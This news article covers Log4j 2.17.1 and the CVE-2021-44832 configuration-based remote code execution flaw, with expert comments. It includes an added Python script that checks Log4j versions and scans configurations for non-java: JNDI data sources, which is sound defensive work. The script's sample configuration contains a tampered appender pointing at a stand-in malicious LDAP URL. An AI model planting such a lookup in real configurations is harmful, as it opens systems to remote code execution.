

The Apache Software Foundation has released a new patch for Log4j, the Java-based logging utility that has seen vulnerabilities targeted en masse by hackers since Dec. 13.
Log4j 2.17.1, the fifth update this month, addresses a new remote code execution vulnerability found in 2.17.0. CVE-2021-44832 allows an attacker with permission to modify the logging configuration file to construct a malicious configuration that allows for remote code execution. The vulnerability affects all versions of Log4j from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.
The new vulnerability has been fixed by limiting JNDI data source names to the Java protocol in Log4j version 2.17.1, along with patches for earlier releases: 2.12.4 for Java 8 and 2.3.2 for Java 6.
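Two checks a defender can run follow from the description above: whether a deployed Log4j 2 version is one of the patched releases the article names, and whether a Log4j 2 XML configuration contains a JDBC appender whose data source is looked up through a non-`java:` JNDI name, the condition the 2.17.1 fix restricts. The script below is an added example, not code from the article or from the Log4j project. It relies on the JDBC appender's documented `<JDBC>` / `<DataSource jndiName="...">` configuration elements, and the sample configuration embedded in it is constructed for this demonstration.

```python
"""Defensive checks for CVE-2021-44832 (example code, not from the article or Log4j).

1. is_patched_for_cve_2021_44832(): version gate built from the release list in the
   article (fixed in 2.17.1, with backports 2.12.4 and 2.3.2).
2. find_non_java_jndi_datasources(): scans a Log4j 2 XML configuration for JDBC
   appender data sources whose JNDI name does not use the java: protocol.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample: one benign JDBC appender (java: JNDI name), one tampered
# appender pointing the data-source lookup at an external LDAP URL.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="dbLog" tableName="app_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="tamperedLog" tableName="app_log">
      <DataSource jndiName="ldap://malicious.example.invalid:1389/obj"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <Console name="stdout">
      <PatternLayout pattern="%m%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbLog"/></Root>
  </Loggers>
</Configuration>
"""


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '2.17.1' or '2.0-alpha7' into a comparable (major, minor, patch) tuple."""
    core = version.split("-")[0]  # drop pre-release suffix such as '-alpha7'
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def is_patched_for_cve_2021_44832(version: str) -> bool:
    """True if this Log4j 2.x version carries the fix described in the article."""
    major, minor, patch = parse_version(version)
    if major != 2:
        raise ValueError("only Log4j 2.x is covered by this check")
    if (major, minor, patch) >= (2, 17, 1):
        return True
    # Backported fixes for the older branches named in the article.
    if minor == 12 and patch >= 4:
        return True
    if minor == 3 and patch >= 2:
        return True
    return False


def find_non_java_jndi_datasources(xml_text: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC DataSource not on java:.

    Log4j matches plugin element names case-insensitively, so tags are lowered
    before comparison. Only trusted, locally read configuration should be fed in.
    """
    root = ET.fromstring(xml_text)
    findings: List[Tuple[str, str]] = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        appender_name = appender.get("name", "<unnamed>")
        for child in appender.iter():
            if child.tag.lower() != "datasource":
                continue
            jndi_name = child.get("jndiName", "")
            if not jndi_name.lower().startswith("java:"):
                findings.append((appender_name, jndi_name))
    return findings


if __name__ == "__main__":
    for v in ("2.17.0", "2.17.1", "2.12.4", "2.3.2", "2.0-alpha7"):
        print(f"{v:>10}: {'patched' if is_patched_for_cve_2021_44832(v) else 'vulnerable'}")
    for name, jndi in find_non_java_jndi_datasources(SAMPLE_CONFIG):
        print(f"appender {name!r} uses non-java: JNDI data source {jndi!r}")
```

The configuration scan is the more useful of the two in practice: a version gate tells you whether the library itself would refuse a non-`java:` lookup, while a finding from the scan shows that someone with write access to the configuration file has already pointed a JDBC appender at an external resolver, which is exactly the precondition the CVE requires.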
The vulnerability has a Common Vulnerability Scoring System score of 6.6. As researchers at Snyk Ltd. noted today, it’s not as bad as it sounds, although they added that those running Log4j should apply the new patches.
“The Log4j CVE being released today requires a fairly obscure set of conditions to trigger,” Casey Ellis, founder and chief technology officer at crowdsourced security company Bugcrowd Inc., told SiliconANGLE. “So, while it’s important for people to keep an eye out for newly released CVEs for situational awareness, this CVE doesn’t appear to increase the already elevated risk of compromise via Log4j.”
Ellis explained that the vulnerability appears to have been discovered through the use of static code analysis tools in conjunction with manual review/exploit development. “As a logging library, Log4j is inherently flexible in terms of how data can be passed to it — each of these points of interaction is a potential vector for exploitation,” Ellis noted. “Many eyes are currently scouring Log4j, so it’s fairly safe to expect more of this type of vulnerability announcement over the coming weeks. In the interest of staying as up-to-date as possible with Log4j — especially if the configurations required for exploiting CVE-2021-44832 — patching to 2.17.1 is a good idea.”